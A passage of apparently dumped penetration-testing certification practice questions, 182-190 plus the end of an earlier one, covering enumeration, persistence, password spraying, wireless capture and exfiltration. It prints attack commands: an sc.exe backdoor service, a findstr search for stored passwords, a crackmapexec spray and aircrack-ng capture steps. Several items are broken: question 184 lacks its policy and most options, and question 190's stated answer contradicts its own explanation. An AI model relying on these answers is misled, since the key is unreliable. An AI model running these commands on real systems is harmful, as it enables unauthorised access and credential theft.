During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?
A. Nikto
B. Burp Suite
C. smbclient
D. theHarvester
Correct Answer: C
The smbclient tool is used to access SMB/CIFS resources on a network. It allows penetration testers to connect to shared resources and enumerate users on a network, particularly in Windows environments. While finger and rwho are more common on Unix/Linux systems, smbclient provides better functionality for enumerating users across a network.
References: Penetration Testing - A Hands-on Introduction to Hacking; HTB Official Writeups
Question 182:
A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
A. schtasks.exe
B. rundll.exe
C. cmd.exe
D. chgusr.exe
E. sc.exe
F. netsh.exe
Correct Answer: AE
To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.
sc create backdoor binPath= "C:\path\to\backdoor.exe" start= auto
Pentest References:
Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.
Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.
By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.
Question 183:
During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command: findstr /SIM /C:"pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?
A. Configuration files
B. Permissions
C. Virtual hosts
D. Secrets
Correct Answer: D
By running the command findstr /SIM /C:"pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.
Pentest References:
Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation activity after gaining initial access.
Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.
By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.
Question 184:
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:
D. tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz
Correct Answer: A
Given the firewall policy, let's analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are:
Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration.
The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
Question 185:
Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?
A. Preserving artifacts
B. Reverting configuration changes
C. Keeping chain of custody
D. Exporting credential data
Correct Answer: A
Preserving artifacts ensures that key outputs from the penetration test, such as logs, screenshots, captured data, and any generated reports, are retained for analysis, reporting, and future reference.
References: Penetration Testing - A Hands-on Introduction to Hacking; HTB Official Writeups
Question 186:
While performing an internal assessment, a tester uses the following command: crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@
Which of the following is the main purpose of the command?
A. To perform a pass-the-hash attack over multiple endpoints within the internal network
B. To perform common protocol scanning within the internal network
C. To perform password spraying on internal systems
D. To execute a command in multiple endpoints at the same time
Correct Answer: C
The command crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ is used to perform password spraying on internal systems. CrackMapExec (CME) is a post-exploitation tool that helps automate the process of assessing large Active Directory networks. It supports multiple protocols, including SMB, and can perform various actions like password spraying, command execution, and more.
Pentest References:
Password Spraying: An effective method for gaining initial access during penetration tests, particularly against organizations that have weak password policies or commonly used passwords.
CrackMapExec: Widely used in penetration testing for its ability to automate and streamline the process of credential validation and exploitation across large networks.
By using the specified command, the tester performs a password spraying attack, attempting to log in with a common password across multiple usernames, identifying potential weak accounts.
Question 187:
A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?
A. Enable monitoring mode using Aircrack-ng.
B. Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.
C. Run KARMA to break the password.
D. Research WiGLE.net for potential nearby client access points.
Correct Answer: A
Aircrack-ng Suite:
airmon-ng start wlan0
This command puts the wlan0 interface into monitor mode; the suite exposes the monitor interface as wlan0mon.
Steps to Capture WPA2 Handshakes:
airodump-ng wlan0mon
Pentest References:
Wireless Security Assessments: Understanding the importance of monitor mode for capturing data during wireless penetration tests.
Aircrack-ng Tools: Utilizing the suite effectively for tasks like capturing WPA2 handshakes, deauthenticating clients, and cracking passwords.
By enabling monitor mode with Aircrack-ng, the tester can capture the necessary WPA2 handshakes to further analyze and attempt to crack the Wi-Fi network's password.
Question 188:
During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?
A. On-path
B. Logic bomb
C. Rootkit
D. Buffer overflow
Correct Answer: C
A rootkit is a type of malicious software designed to provide an attacker with unauthorized access to a computer system while concealing its presence. Rootkits achieve this by modifying the host's operating system or other software to hide their existence, allowing the attacker to maintain control over the system without detection.
References: Penetration Testing - A Hands-on Introduction to Hacking; HTB Official Writeups on sophisticated attacks
Question 189:
A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?
A. OWASP MASVS
B. OSSTMM
C. MITRE ATT&CK
D. CREST
Correct Answer: B
The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for security testing that includes 14 components in its life cycle. Here's why option B is correct:
OSSTMM: This methodology breaks down the security testing process into 14 components, covering various aspects of security assessment, from planning to execution and reporting.
OWASP MASVS: This is a framework for mobile application security verification and does not have a 14-component life cycle.
MITRE ATT&CK: This is a knowledge base of adversary tactics and techniques but does not describe a 14-component life cycle.
CREST: This is a certification body for penetration testers and security professionals but does not provide a specific 14-component framework.
Pentest References:
Anubis HTB: Emphasizes the structured approach of OSSTMM in conducting comprehensive security assessments.
Writeup HTB: Highlights the use of detailed methodologies like OSSTMM to cover all aspects of security testing.
Conclusion:
Option B, OSSTMM, is the framework that breaks the life cycle into 14 components, making it the correct answer.
Question 190:
A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?
A. A generative AI assistant
B. The customer's designated contact
C. A cybersecurity industry peer
D. A team member
Correct Answer: B
Before sharing a report with a client, it is crucial to have it reviewed to ensure accuracy, clarity, and completeness. The best choice for this review is a team member. Here's why:
In summary, an internal team member is the most suitable choice for a thorough and contextually accurate review before sharing the report with the client.